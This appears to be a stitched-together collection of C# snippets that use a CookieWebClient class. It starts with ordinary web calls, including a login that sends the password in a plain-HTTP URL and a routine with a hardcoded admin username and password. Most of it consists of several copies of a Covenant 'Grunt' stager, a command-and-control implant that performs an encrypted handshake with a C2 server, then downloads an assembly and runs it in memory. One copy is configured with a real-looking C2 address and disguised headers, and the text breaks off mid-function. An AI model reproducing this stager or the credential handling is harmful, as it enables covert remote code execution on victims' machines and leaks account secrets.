/// <summary>
/// Post feedback form data to main website
/// </summary>
/// <returns></returns>
public ResponseResult PostFeedback()
{
var result = new ResponseResult();
try
{
using (var wc = new CookieWebClient())
{
// get postback cookies
wc.DownloadString(Uri);
// send feedback
wc.Headers[HttpRequestHeader.ContentType] = "application/x-www-form-urlencoded";
var body = form.Serialize();
var htmlResult = wc.UploadString(Uri, body);
result.OK = htmlResult.Contains(OkResponse);
if (result.OK)
{
result.StatusCode = 200;
}
}
}
catch (Exception e)
{
result = new ResponseResult(e)
{
StatusCode = 500, OK = false
};
}
return(result);
}
private async void ButtonLogin_OnClicked(object sender, EventArgs e)
{
var username = EntryUsername.Text;
var password = EntryPassword.Text;
using (var client = new CookieWebClient())
{
var response = client.DownloadString($"http://web.kraxarn.com:5000/user/login?username={username}&password={password}");
var json = JsonConvert.DeserializeObject <JsonResult>(response);
if (json.Error)
{
await DisplayAlert("Login failed", "Invalid username, password or you put your sock on backwards", "uh...");
}
else
{
// Cookies received
Account.Cookies = client.CookieContainer;
// Username used
Account.Username = username;
// Save changes
Account.Save();
// Go back to account page
await Navigation.PopModalAsync();
}
}
}
/// <summary>
/// Fetches an XML document from the printer.
/// </summary>
/// <param name="endpoint">The endpoint for which to return the XML document.</param>
protected virtual XmlDocument FetchXml(string endpoint)
{
var docString = Client.DownloadString(GetUri(endpoint));
var doc = new XmlDocument();
doc.LoadXml(docString);
return(doc);
}
public object Call(ServerCallParameters parameters, object targetObject, object parent)
{
if (parameters == null)
{
throw new ArgumentNullException(nameof(parameters));
}
using (var client = new CookieWebClient())
{
if (Cookie != null)
{
client.Cookies.Add(new Cookie(CookieName, Cookie, "/", new Uri(Url).Host));
}
var uri = new EditableUri(Url + "/api/" + parameters.Api);
if (!string.IsNullOrWhiteSpace(parameters.Format))
{
uri.Parameters["f"] = parameters.Format;
}
if (parameters.Lcid != 0)
{
uri.Parameters["l"] = parameters.Lcid;
}
client.Encoding = Encoding.UTF8;
string s;
try
{
s = client.DownloadString(uri.ToString());
}
catch (WebException e)
{
var eb = new ErrorBox(e, e.GetErrorText(null));
eb.ShowDialog();
throw;
}
var options = new JsonUtilitiesOptions();
options.CreateInstanceCallback = (e) =>
{
Type type = (Type)e.Value;
if (typeof(TreeItem).IsAssignableFrom(type))
{
e.Value = Activator.CreateInstance(type, new object[] { parent });
e.Handled = true;
}
};
if (targetObject != null)
{
JsonUtilities.Deserialize(s, targetObject, options);
return(null);
}
return(JsonUtilities.Deserialize(s));
}
}
public string Get(string url)
{
using (var wc = new CookieWebClient(_cookieContainer))
{
wc.Encoding = Encoding.UTF8;
wc.Headers[HttpRequestHeader.ContentType] = "application/json";
SetHeaders(wc);
return(wc.DownloadString(_baseUrl + "/" + url));
}
}
void DownloadPOSUPdate()
{
var values = new NameValueCollection
{
{ "username", "russ" },
{ "password", "1tennesseeb" },
};
using (var client = new CookieWebClient())
{
byte[] b = client.UploadValues("http://test.deviumrocks.com/admin/index.php?route=common/login", values);
string x = System.Text.ASCIIEncoding.UTF8.GetString(b);
//token=686fc274c18ff279662a39bc57490c2f'
int posstart = x.IndexOf("token=");
int posend = x.IndexOf("'", posstart);
string token = x.Substring(posstart, posend - posstart);
// If the previous call succeeded we now have a valid authentication cookie
// so we could download the protected page
string result = client.DownloadString(string.Format("http://test.deviumrocks.com/admin/index.php?route=report/stock&{0}&pos", token));
}
}
void DownloadPOSUPdate()
{
var values = new NameValueCollection
{
{ "username", "russ" },
{ "password", "1tennesseeb" },
};
using (var client = new CookieWebClient())
{
byte[] b = client.UploadValues("http://test.deviumrocks.com/admin/index.php?route=common/login", values);
string x = System.Text.ASCIIEncoding.UTF8.GetString(b);
//token=686fc274c18ff279662a39bc57490c2f'
int posstart = x.IndexOf("token=");
int posend = x.IndexOf("'", posstart);
string token = x.Substring(posstart, posend - posstart);
// If the previous call succeeded we now have a valid authentication cookie
// so we could download the protected page
string result = client.DownloadString(string.Format("http://test.deviumrocks.com/admin/index.php?route=report/stock&{0}&pos", token));
}
}
public void ExecuteStager()
{
try
{
List <string> CovenantURIs = @"{{REPLACE_COVENANT_URIS}}".Split(',').ToList();
string CovenantCertHash = @"{{REPLACE_COVENANT_CERT_HASH}}";
List <string> ProfileHttpHeaderNames = @"{{REPLACE_PROFILE_HTTP_HEADER_NAMES}}".Split(',').ToList().Select(H => System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(H))).ToList();
List <string> ProfileHttpHeaderValues = @"{{REPLACE_PROFILE_HTTP_HEADER_VALUES}}".Split(',').ToList().Select(H => System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(H))).ToList();
List <string> ProfileHttpUrls = @"{{REPLACE_PROFILE_HTTP_URLS}}".Split(',').ToList().Select(U => System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(U))).ToList();
string ProfileHttpPostRequest = @"{{REPLACE_PROFILE_HTTP_POST_REQUEST}}".Replace(Environment.NewLine, "\n");
string ProfileHttpPostResponse = @"{{REPLACE_PROFILE_HTTP_POST_RESPONSE}}".Replace(Environment.NewLine, "\n");
bool ValidateCert = bool.Parse(@"{{REPLACE_VALIDATE_CERT}}");
bool UseCertPinning = bool.Parse(@"{{REPLACE_USE_CERT_PINNING}}");
Random random = new Random();
string aGUID = @"{{REPLACE_GRUNT_GUID}}";
string GUID = Guid.NewGuid().ToString().Replace("-", "").Substring(0, 10);
byte[] SetupKeyBytes = Convert.FromBase64String(@"{{REPLACE_GRUNT_SHARED_SECRET_PASSWORD}}");
string MessageFormat = @"{{""GUID"":""{0}"",""Type"":{1},""Meta"":""{2}"",""IV"":""{3}"",""EncryptedMessage"":""{4}"",""HMAC"":""{5}""}}";
Aes SetupAESKey = Aes.Create();
SetupAESKey.Mode = CipherMode.CBC;
SetupAESKey.Padding = PaddingMode.PKCS7;
SetupAESKey.Key = SetupKeyBytes;
SetupAESKey.GenerateIV();
HMACSHA256 hmac = new HMACSHA256(SetupKeyBytes);
RSACryptoServiceProvider rsa = new RSACryptoServiceProvider(2048, new CspParameters());
byte[] RSAPublicKeyBytes = Encoding.UTF8.GetBytes(rsa.ToXmlString(false));
byte[] EncryptedRSAPublicKey = SetupAESKey.CreateEncryptor().TransformFinalBlock(RSAPublicKeyBytes, 0, RSAPublicKeyBytes.Length);
byte[] hash = hmac.ComputeHash(EncryptedRSAPublicKey);
string Stage0Body = String.Format(MessageFormat, aGUID + GUID, "0", "", Convert.ToBase64String(SetupAESKey.IV), Convert.ToBase64String(EncryptedRSAPublicKey), Convert.ToBase64String(hash));
ServicePointManager.SecurityProtocol = SecurityProtocolType.Ssl3 | SecurityProtocolType.Tls;
ServicePointManager.ServerCertificateValidationCallback = (sender, cert, chain, errors) =>
{
bool valid = true;
if (UseCertPinning && CovenantCertHash != "")
{
valid = cert.GetCertHashString() == CovenantCertHash;
}
if (valid && ValidateCert)
{
valid = errors == System.Net.Security.SslPolicyErrors.None;
}
return(valid);
};
string transformedResponse = HttpMessageTransform.Transform(Encoding.UTF8.GetBytes(Stage0Body));
CookieWebClient wc = null;
string Stage0Response = "";
wc = new CookieWebClient();
wc.UseDefaultCredentials = true;
wc.Proxy = WebRequest.DefaultWebProxy;
wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
string CovenantURI = "";
foreach (string uri in CovenantURIs)
{
try
{
for (int i = 0; i < ProfileHttpHeaderValues.Count; i++)
{
wc.Headers.Set(ProfileHttpHeaderNames[i], ProfileHttpHeaderValues[i]);
}
wc.DownloadString(uri + ProfileHttpUrls[random.Next(ProfileHttpUrls.Count)]);
CovenantURI = uri;
}
catch
{
continue;
}
}
for (int i = 0; i < ProfileHttpHeaderValues.Count; i++)
{
wc.Headers.Set(ProfileHttpHeaderNames[i], ProfileHttpHeaderValues[i]);
}
Stage0Response = wc.UploadString(CovenantURI + ProfileHttpUrls[random.Next(ProfileHttpUrls.Count)], String.Format(ProfileHttpPostRequest, transformedResponse)).Replace("\"", "");
string extracted = Parse(Stage0Response, ProfileHttpPostResponse)[0];
extracted = Encoding.UTF8.GetString(HttpMessageTransform.Invert(extracted));
List <string> parsed = Parse(extracted, MessageFormat);
string iv64str = parsed[3];
string message64str = parsed[4];
string hash64str = parsed[5];
byte[] messageBytes = Convert.FromBase64String(message64str);
if (hash64str != Convert.ToBase64String(hmac.ComputeHash(messageBytes)))
{
return;
}
SetupAESKey.IV = Convert.FromBase64String(iv64str);
byte[] PartiallyDecrypted = SetupAESKey.CreateDecryptor().TransformFinalBlock(messageBytes, 0, messageBytes.Length);
byte[] FullyDecrypted = rsa.Decrypt(PartiallyDecrypted, true);
Aes SessionKey = Aes.Create();
SessionKey.Mode = CipherMode.CBC;
SessionKey.Padding = PaddingMode.PKCS7;
SessionKey.Key = FullyDecrypted;
SessionKey.GenerateIV();
hmac = new HMACSHA256(SessionKey.Key);
byte[] challenge1 = new byte[4];
RandomNumberGenerator rng = RandomNumberGenerator.Create();
rng.GetBytes(challenge1);
byte[] EncryptedChallenge1 = SessionKey.CreateEncryptor().TransformFinalBlock(challenge1, 0, challenge1.Length);
hash = hmac.ComputeHash(EncryptedChallenge1);
string Stage1Body = String.Format(MessageFormat, GUID, "1", "", Convert.ToBase64String(SessionKey.IV), Convert.ToBase64String(EncryptedChallenge1), Convert.ToBase64String(hash));
transformedResponse = HttpMessageTransform.Transform(Encoding.UTF8.GetBytes(Stage1Body));
string Stage1Response = "";
for (int i = 0; i < ProfileHttpHeaderValues.Count; i++)
{
wc.Headers.Set(ProfileHttpHeaderNames[i], ProfileHttpHeaderValues[i]);
}
Stage1Response = wc.UploadString(CovenantURI + ProfileHttpUrls[random.Next(ProfileHttpUrls.Count)], String.Format(ProfileHttpPostRequest, transformedResponse)).Replace("\"", "");
extracted = Parse(Stage1Response, ProfileHttpPostResponse)[0];
extracted = Encoding.UTF8.GetString(HttpMessageTransform.Invert(extracted));
parsed = Parse(extracted, MessageFormat);
iv64str = parsed[3];
message64str = parsed[4];
hash64str = parsed[5];
messageBytes = Convert.FromBase64String(message64str);
if (hash64str != Convert.ToBase64String(hmac.ComputeHash(messageBytes)))
{
return;
}
SessionKey.IV = Convert.FromBase64String(iv64str);
byte[] DecryptedChallenges = SessionKey.CreateDecryptor().TransformFinalBlock(messageBytes, 0, messageBytes.Length);
byte[] challenge1Test = new byte[4];
byte[] challenge2 = new byte[4];
Buffer.BlockCopy(DecryptedChallenges, 0, challenge1Test, 0, 4);
Buffer.BlockCopy(DecryptedChallenges, 4, challenge2, 0, 4);
if (Convert.ToBase64String(challenge1) != Convert.ToBase64String(challenge1Test))
{
return;
}
SessionKey.GenerateIV();
byte[] EncryptedChallenge2 = SessionKey.CreateEncryptor().TransformFinalBlock(challenge2, 0, challenge2.Length);
hash = hmac.ComputeHash(EncryptedChallenge2);
string Stage2Body = String.Format(MessageFormat, GUID, "2", "", Convert.ToBase64String(SessionKey.IV), Convert.ToBase64String(EncryptedChallenge2), Convert.ToBase64String(hash));
transformedResponse = HttpMessageTransform.Transform(Encoding.UTF8.GetBytes(Stage2Body));
string Stage2Response = "";
for (int i = 0; i < ProfileHttpHeaderValues.Count; i++)
{
wc.Headers.Set(ProfileHttpHeaderNames[i], ProfileHttpHeaderValues[i]);
}
Stage2Response = wc.UploadString(CovenantURI + ProfileHttpUrls[random.Next(ProfileHttpUrls.Count)], String.Format(ProfileHttpPostRequest, transformedResponse)).Replace("\"", "");
extracted = Parse(Stage2Response, ProfileHttpPostResponse)[0];
extracted = Encoding.UTF8.GetString(HttpMessageTransform.Invert(extracted));
parsed = Parse(extracted, MessageFormat);
iv64str = parsed[3];
message64str = parsed[4];
hash64str = parsed[5];
messageBytes = Convert.FromBase64String(message64str);
if (hash64str != Convert.ToBase64String(hmac.ComputeHash(messageBytes)))
{
return;
}
SessionKey.IV = Convert.FromBase64String(iv64str);
byte[] DecryptedAssembly = SessionKey.CreateDecryptor().TransformFinalBlock(messageBytes, 0, messageBytes.Length);
Assembly gruntAssembly = Assembly.Load(DecryptedAssembly);
gruntAssembly.GetTypes()[0].GetMethods()[0].Invoke(null, new Object[] { CovenantURI, CovenantCertHash, GUID, SessionKey });
}
catch (Exception e) { Console.Error.WriteLine(e.Message); }
}
public void ExecuteStager()
{
try
{
string CovenantURI = @"{{REPLACE_COVENANT_URI}}";
string CovenantCertHash = @"{{REPLACE_COVENANT_CERT_HASH}}";
List <string> ProfileHttpHeaderNames = new List <string>();
List <string> ProfileHttpHeaderValues = new List <string>();
// {{REPLACE_PROFILE_HTTP_HEADERS}}
List <string> ProfileHttpUrls = new List <string>();
// {{REPLACE_PROFILE_HTTP_URLS}}
string ProfileHttpPostRequest = @"{{REPLACE_PROFILE_HTTP_POST_REQUEST}}";
string ProfileHttpPostResponse = @"{{REPLACE_PROFILE_HTTP_POST_RESPONSE}}";
string CommType = @"{{REPLACE_COMM_TYPE}}";
bool ValidateCert = bool.Parse(@"{{REPLACE_VALIDATE_CERT}}");
bool UseCertPinning = bool.Parse(@"{{REPLACE_USE_CERT_PINNING}}");
string PipeName = @"{{REPLACE_PIPE_NAME}}";
Random random = new Random();
string aGUID = @"{{REPLACE_GRUNT_GUID}}";
string GUID = Guid.NewGuid().ToString().Replace("-", "").Substring(0, 10);
byte[] SetupKeyBytes = Convert.FromBase64String(@"{{REPLACE_GRUNT_SHARED_SECRET_PASSWORD}}");
string MessageFormat = @"{{""GUID"":""{0}"",""Type"":{1},""Meta"":""{2}"",""IV"":""{3}"",""EncryptedMessage"":""{4}"",""HMAC"":""{5}""}}";
Aes SetupAESKey = Aes.Create();
SetupAESKey.Mode = CipherMode.CBC;
SetupAESKey.Padding = PaddingMode.PKCS7;
SetupAESKey.Key = SetupKeyBytes;
SetupAESKey.GenerateIV();
HMACSHA256 hmac = new HMACSHA256(SetupKeyBytes);
RSACryptoServiceProvider rsa = new RSACryptoServiceProvider(2048, new CspParameters());
byte[] RSAPublicKeyBytes = Encoding.UTF8.GetBytes(rsa.ToXmlString(false));
byte[] EncryptedRSAPublicKey = SetupAESKey.CreateEncryptor().TransformFinalBlock(RSAPublicKeyBytes, 0, RSAPublicKeyBytes.Length);
byte[] hash = hmac.ComputeHash(EncryptedRSAPublicKey);
string Stage0Body = String.Format(MessageFormat, aGUID + GUID, "0", "", Convert.ToBase64String(SetupAESKey.IV), Convert.ToBase64String(EncryptedRSAPublicKey), Convert.ToBase64String(hash));
ServicePointManager.SecurityProtocol = SecurityProtocolType.Ssl3 | SecurityProtocolType.Tls;
ServicePointManager.ServerCertificateValidationCallback = (sender, cert, chain, errors) =>
{
bool valid = true;
if (UseCertPinning && CovenantCertHash != "")
{
valid = cert.GetCertHashString() == CovenantCertHash;
}
if (valid && ValidateCert)
{
valid = errors == System.Net.Security.SslPolicyErrors.None;
}
return(valid);
};
string transformedResponse = HttpMessageTransform.Transform(Encoding.UTF8.GetBytes(Stage0Body));
NamedPipeServerStream pipe = null;
CookieWebClient wc = null;
string Stage0Response = "";
if (CommType == "SMB")
{
PipeSecurity ps = new PipeSecurity();
ps.AddAccessRule(new PipeAccessRule("Everyone", PipeAccessRights.FullControl, System.Security.AccessControl.AccessControlType.Allow));
pipe = new NamedPipeServerStream(PipeName, PipeDirection.InOut, NamedPipeServerStream.MaxAllowedServerInstances, PipeTransmissionMode.Byte, PipeOptions.Asynchronous, 1024, 1024, ps);
pipe.WaitForConnection();
System.Threading.Thread.Sleep(5000);
var Stage0Bytes = Encoding.UTF8.GetBytes(String.Format(ProfileHttpPostRequest, transformedResponse));
Write(pipe, Stage0Bytes);
Stage0Response = Encoding.UTF8.GetString(Read(pipe)).Replace("\"", "");
}
else
{
wc = new CookieWebClient();
wc.UseDefaultCredentials = true;
wc.Proxy = WebRequest.DefaultWebProxy;
wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
for (int i = 0; i < ProfileHttpHeaderValues.Count; i++)
{
wc.Headers.Set(ProfileHttpHeaderNames[i], ProfileHttpHeaderValues[i]);
}
wc.DownloadString(CovenantURI + ProfileHttpUrls[random.Next(ProfileHttpUrls.Count)]);
for (int i = 0; i < ProfileHttpHeaderValues.Count; i++)
{
wc.Headers.Set(ProfileHttpHeaderNames[i], ProfileHttpHeaderValues[i]);
}
Stage0Response = wc.UploadString(CovenantURI + ProfileHttpUrls[random.Next(ProfileHttpUrls.Count)], String.Format(ProfileHttpPostRequest, transformedResponse)).Replace("\"", "");
}
string extracted = Parse(Stage0Response, ProfileHttpPostResponse)[0];
extracted = Encoding.UTF8.GetString(HttpMessageTransform.Invert(extracted));
List <string> parsed = Parse(extracted, MessageFormat);
string iv64str = parsed[3];
string message64str = parsed[4];
string hash64str = parsed[5];
byte[] messageBytes = Convert.FromBase64String(message64str);
if (hash64str != Convert.ToBase64String(hmac.ComputeHash(messageBytes)))
{
return;
}
SetupAESKey.IV = Convert.FromBase64String(iv64str);
byte[] PartiallyDecrypted = SetupAESKey.CreateDecryptor().TransformFinalBlock(messageBytes, 0, messageBytes.Length);
byte[] FullyDecrypted = rsa.Decrypt(PartiallyDecrypted, true);
Aes SessionKey = Aes.Create();
SessionKey.Mode = CipherMode.CBC;
SessionKey.Padding = PaddingMode.PKCS7;
SessionKey.Key = FullyDecrypted;
SessionKey.GenerateIV();
hmac = new HMACSHA256(SessionKey.Key);
byte[] challenge1 = new byte[4];
RandomNumberGenerator rng = RandomNumberGenerator.Create();
rng.GetBytes(challenge1);
byte[] EncryptedChallenge1 = SessionKey.CreateEncryptor().TransformFinalBlock(challenge1, 0, challenge1.Length);
hash = hmac.ComputeHash(EncryptedChallenge1);
string Stage1Body = String.Format(MessageFormat, GUID, "1", "", Convert.ToBase64String(SessionKey.IV), Convert.ToBase64String(EncryptedChallenge1), Convert.ToBase64String(hash));
transformedResponse = HttpMessageTransform.Transform(Encoding.UTF8.GetBytes(Stage1Body));
string Stage1Response = "";
if (CommType == "SMB")
{
var Stage1Bytes = Encoding.UTF8.GetBytes(String.Format(ProfileHttpPostRequest, transformedResponse));
Write(pipe, Stage1Bytes);
Stage1Response = Encoding.UTF8.GetString(Read(pipe)).Replace("\"", "");
}
else
{
for (int i = 0; i < ProfileHttpHeaderValues.Count; i++)
{
wc.Headers.Set(ProfileHttpHeaderNames[i], ProfileHttpHeaderValues[i]);
}
Stage1Response = wc.UploadString(CovenantURI + ProfileHttpUrls[random.Next(ProfileHttpUrls.Count)], String.Format(ProfileHttpPostRequest, transformedResponse)).Replace("\"", "");
}
extracted = Parse(Stage1Response, ProfileHttpPostResponse)[0];
extracted = Encoding.UTF8.GetString(HttpMessageTransform.Invert(extracted));
parsed = Parse(extracted, MessageFormat);
iv64str = parsed[3];
message64str = parsed[4];
hash64str = parsed[5];
messageBytes = Convert.FromBase64String(message64str);
if (hash64str != Convert.ToBase64String(hmac.ComputeHash(messageBytes)))
{
return;
}
SessionKey.IV = Convert.FromBase64String(iv64str);
byte[] DecryptedChallenges = SessionKey.CreateDecryptor().TransformFinalBlock(messageBytes, 0, messageBytes.Length);
byte[] challenge1Test = new byte[4];
byte[] challenge2 = new byte[4];
Buffer.BlockCopy(DecryptedChallenges, 0, challenge1Test, 0, 4);
Buffer.BlockCopy(DecryptedChallenges, 4, challenge2, 0, 4);
if (Convert.ToBase64String(challenge1) != Convert.ToBase64String(challenge1Test))
{
return;
}
SessionKey.GenerateIV();
byte[] EncryptedChallenge2 = SessionKey.CreateEncryptor().TransformFinalBlock(challenge2, 0, challenge2.Length);
hash = hmac.ComputeHash(EncryptedChallenge2);
string Stage2Body = String.Format(MessageFormat, GUID, "2", "", Convert.ToBase64String(SessionKey.IV), Convert.ToBase64String(EncryptedChallenge2), Convert.ToBase64String(hash));
transformedResponse = HttpMessageTransform.Transform(Encoding.UTF8.GetBytes(Stage2Body));
string Stage2Response = "";
if (CommType == "SMB")
{
var Stage2Bytes = Encoding.UTF8.GetBytes(String.Format(ProfileHttpPostRequest, transformedResponse));
Write(pipe, Stage2Bytes);
Stage2Response = Encoding.UTF8.GetString(Read(pipe)).Replace("\"", "");
}
else
{
for (int i = 0; i < ProfileHttpHeaderValues.Count; i++)
{
wc.Headers.Set(ProfileHttpHeaderNames[i], ProfileHttpHeaderValues[i]);
}
Stage2Response = wc.UploadString(CovenantURI + ProfileHttpUrls[random.Next(ProfileHttpUrls.Count)], String.Format(ProfileHttpPostRequest, transformedResponse)).Replace("\"", "");
}
extracted = Parse(Stage2Response, ProfileHttpPostResponse)[0];
extracted = Encoding.UTF8.GetString(HttpMessageTransform.Invert(extracted));
parsed = Parse(extracted, MessageFormat);
iv64str = parsed[3];
message64str = parsed[4];
hash64str = parsed[5];
messageBytes = Convert.FromBase64String(message64str);
if (hash64str != Convert.ToBase64String(hmac.ComputeHash(messageBytes)))
{
return;
}
SessionKey.IV = Convert.FromBase64String(iv64str);
byte[] DecryptedAssembly = SessionKey.CreateDecryptor().TransformFinalBlock(messageBytes, 0, messageBytes.Length);
Assembly gruntAssembly = Assembly.Load(DecryptedAssembly);
gruntAssembly.GetTypes()[0].GetMethods()[0].Invoke(null, new Object[] { GUID, SessionKey, pipe, PipeName });
}
catch (Exception e) { Console.Error.WriteLine(e.Message); }
}
public void ExecuteStager()
{
try
{
string CovenantURI = @"{{REPLACE_COVENANT_URI}}";
string CovenantCertHash = @"{{REPLACE_COVENANT_CERT_HASH}}";
List <string> ProfileHttpHeaderNames = new List <string>();
List <string> ProfileHttpHeaderValues = new List <string>();
// {{REPLACE_PROFILE_HTTP_HEADERS}}
List <string> ProfileHttpUrls = new List <string>();
// {{REPLACE_PROFILE_HTTP_URLS}}
string ProfileHttpPostRequest = @"{{REPLACE_PROFILE_HTTP_POST_REQUEST}}";
string ProfileHttpPostResponse = @"{{REPLACE_PROFILE_HTTP_POST_RESPONSE}}";
Random randomUrl = new Random();
int Id = Convert.ToInt32(@"{{REPLACE_GRUNT_ID}}");
string Name = @"{{REPLACE_GRUNT_NAME}}";
byte[] SetupKeyBytes = Convert.FromBase64String(@"{{REPLACE_GRUNT_SHARED_SECRET_PASSWORD}}");
string MessageFormat = @"{{ ""Id"": {0}, ""Name"": ""{1}"", ""Type"": {2}, ""IV"": ""{3}"", ""EncryptedMessage"": ""{4}"", ""HMAC"": ""{5}"" }}";
Aes SetupAESKey = Aes.Create();
SetupAESKey.Mode = CipherMode.CBC;
SetupAESKey.Padding = PaddingMode.PKCS7;
SetupAESKey.Key = SetupKeyBytes;
SetupAESKey.GenerateIV();
HMACSHA256 hmac = new HMACSHA256(SetupKeyBytes);
RSACryptoServiceProvider rsa = new RSACryptoServiceProvider(2048, new CspParameters());
byte[] RSAPublicKeyBytes = Encoding.UTF8.GetBytes(rsa.ToXmlString(false));
byte[] EncryptedRSAPublicKey = SetupAESKey.CreateEncryptor().TransformFinalBlock(RSAPublicKeyBytes, 0, RSAPublicKeyBytes.Length);
byte[] hash = hmac.ComputeHash(EncryptedRSAPublicKey);
string Stage0Body = String.Format(MessageFormat, Id, Name, "0", Convert.ToBase64String(SetupAESKey.IV), Convert.ToBase64String(EncryptedRSAPublicKey), Convert.ToBase64String(hash));
CookieWebClient wc = new CookieWebClient();
wc.UseDefaultCredentials = true;
wc.Proxy = WebRequest.DefaultWebProxy;
wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
wc.DownloadString(CovenantURI + ProfileHttpUrls[randomUrl.Next(ProfileHttpUrls.Count)]);
for (int i = 0; i < ProfileHttpHeaderValues.Count; i++)
{
wc.Headers.Set(ProfileHttpHeaderNames[i], ProfileHttpHeaderValues[i]);
}
if (CovenantCertHash != "")
{
ServicePointManager.SecurityProtocol = SecurityProtocolType.Ssl3 | SecurityProtocolType.Tls;
ServicePointManager.ServerCertificateValidationCallback = (sender, cert, chain, errors) =>
{
return(cert.GetCertHashString() == CovenantCertHash);
};
}
string transformedResponse = HttpMessageTransform.Transform(Encoding.UTF8.GetBytes(Stage0Body));
string Stage0Response = wc.UploadString(CovenantURI + ProfileHttpUrls[randomUrl.Next(ProfileHttpUrls.Count)], String.Format(ProfileHttpPostRequest, transformedResponse)).Replace("\"", "");
string extracted = Parse(Stage0Response, ProfileHttpPostResponse);
extracted = Encoding.UTF8.GetString(HttpMessageTransform.Invert(extracted));
string Gid = extracted.Substring(0, extracted.IndexOf(","));
Id = Convert.ToInt32(Gid);
string cut = extracted.Substring(Gid.Length + 1);
Name = cut.Substring(0, cut.IndexOf(","));
cut = cut.Substring(Name.Length + 1);
string iv64str = cut.Substring(0, cut.IndexOf(","));
cut = cut.Substring(iv64str.Length + 1);
string message64str = cut.Substring(0, cut.IndexOf(","));
string hash64str = cut.Substring(message64str.Length + 1);
byte[] messageBytes = Convert.FromBase64String(message64str);
if (hash64str != Convert.ToBase64String(hmac.ComputeHash(messageBytes)))
{
return;
}
SetupAESKey.IV = Convert.FromBase64String(iv64str);
byte[] PartiallyDecrypted = SetupAESKey.CreateDecryptor().TransformFinalBlock(messageBytes, 0, messageBytes.Length);
byte[] FullyDecrypted = rsa.Decrypt(PartiallyDecrypted, true);
Aes SessionKey = Aes.Create();
SessionKey.Mode = CipherMode.CBC;
SessionKey.Padding = PaddingMode.PKCS7;
SessionKey.Key = FullyDecrypted;
SessionKey.GenerateIV();
hmac = new HMACSHA256(SessionKey.Key);
byte[] challenge1 = new byte[4];
RandomNumberGenerator rng = RandomNumberGenerator.Create();
rng.GetBytes(challenge1);
byte[] EncryptedChallenge1 = SessionKey.CreateEncryptor().TransformFinalBlock(challenge1, 0, challenge1.Length);
hash = hmac.ComputeHash(EncryptedChallenge1);
for (int i = 0; i < ProfileHttpHeaderValues.Count; i++)
{
wc.Headers.Set(ProfileHttpHeaderNames[i], ProfileHttpHeaderValues[i]);
}
string Stage1Body = String.Format(MessageFormat, Id, Name, "1", Convert.ToBase64String(SessionKey.IV), Convert.ToBase64String(EncryptedChallenge1), Convert.ToBase64String(hash));
transformedResponse = HttpMessageTransform.Transform(Encoding.UTF8.GetBytes(Stage1Body));
string Stage1Response = wc.UploadString(CovenantURI + ProfileHttpUrls[randomUrl.Next(ProfileHttpUrls.Count)], String.Format(ProfileHttpPostRequest, transformedResponse)).Replace("\"", "");
extracted = Parse(Stage1Response, ProfileHttpPostResponse);
extracted = Encoding.UTF8.GetString(HttpMessageTransform.Invert(extracted));
iv64str = extracted.Substring(0, extracted.IndexOf(","));
cut = extracted.Substring(iv64str.Length + 1);
message64str = cut.Substring(0, cut.IndexOf(","));
hash64str = extracted.Substring(iv64str.Length + message64str.Length + 2);
messageBytes = Convert.FromBase64String(message64str);
if (hash64str != Convert.ToBase64String(hmac.ComputeHash(messageBytes)))
{
return;
}
SessionKey.IV = Convert.FromBase64String(iv64str);
byte[] DecryptedChallenges = SessionKey.CreateDecryptor().TransformFinalBlock(messageBytes, 0, messageBytes.Length);
byte[] challenge1Test = new byte[4];
byte[] challenge2 = new byte[4];
Buffer.BlockCopy(DecryptedChallenges, 0, challenge1Test, 0, 4);
Buffer.BlockCopy(DecryptedChallenges, 4, challenge2, 0, 4);
if (Convert.ToBase64String(challenge1) != Convert.ToBase64String(challenge1Test))
{
return;
}
SessionKey.GenerateIV();
byte[] EncryptedChallenge2 = SessionKey.CreateEncryptor().TransformFinalBlock(challenge2, 0, challenge2.Length);
hash = hmac.ComputeHash(EncryptedChallenge2);
for (int i = 0; i < ProfileHttpHeaderValues.Count; i++)
{
wc.Headers.Set(ProfileHttpHeaderNames[i], ProfileHttpHeaderValues[i]);
}
string Stage2Body = String.Format(MessageFormat, Id, Name, "2", Convert.ToBase64String(SessionKey.IV), Convert.ToBase64String(EncryptedChallenge2), Convert.ToBase64String(hash));
transformedResponse = HttpMessageTransform.Transform(Encoding.UTF8.GetBytes(Stage2Body));
string Stage2Response = wc.UploadString(CovenantURI + ProfileHttpUrls[randomUrl.Next(ProfileHttpUrls.Count)], String.Format(ProfileHttpPostRequest, transformedResponse)).Replace("\"", "");
extracted = Parse(Stage2Response, ProfileHttpPostResponse);
extracted = Encoding.UTF8.GetString(HttpMessageTransform.Invert(extracted));
iv64str = extracted.Substring(0, extracted.IndexOf(","));
cut = extracted.Substring(iv64str.Length + 1);
message64str = cut.Substring(0, cut.IndexOf(","));
hash64str = extracted.Substring(iv64str.Length + message64str.Length + 2);
messageBytes = Convert.FromBase64String(message64str);
if (hash64str != Convert.ToBase64String(hmac.ComputeHash(messageBytes)))
{
return;
}
SessionKey.IV = Convert.FromBase64String(iv64str);
byte[] DecryptedAssembly = SessionKey.CreateDecryptor().TransformFinalBlock(messageBytes, 0, messageBytes.Length);
Assembly gruntAssembly = Assembly.Load(DecryptedAssembly);
gruntAssembly.GetTypes()[0].GetMethods()[0].Invoke(null, new Object[] { SessionKey });
}
catch (Exception e) { Console.Error.WriteLine(e.Message); }
}
public void ExecuteStager()
{
try
{
List <string> CovenantURIs = @"http://192.168.107.129:80".Split(',').ToList();
string CovenantCertHash = @"";
List <string> ProfileHttpHeaderNames = @"VXNlci1BZ2VudA==,Q29va2ll".Split(',').ToList().Select(H => System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(H))).ToList();
List <string> ProfileHttpHeaderValues = @"TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNDEuMC4yMjI4LjAgU2FmYXJpLzUzNy4zNg==,QVNQU0VTU0lPTklEPXtHVUlEfTsgU0VTU0lPTklEPTE1NTIzMzI5NzE3NTA=".Split(',').ToList().Select(H => System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(H))).ToList();
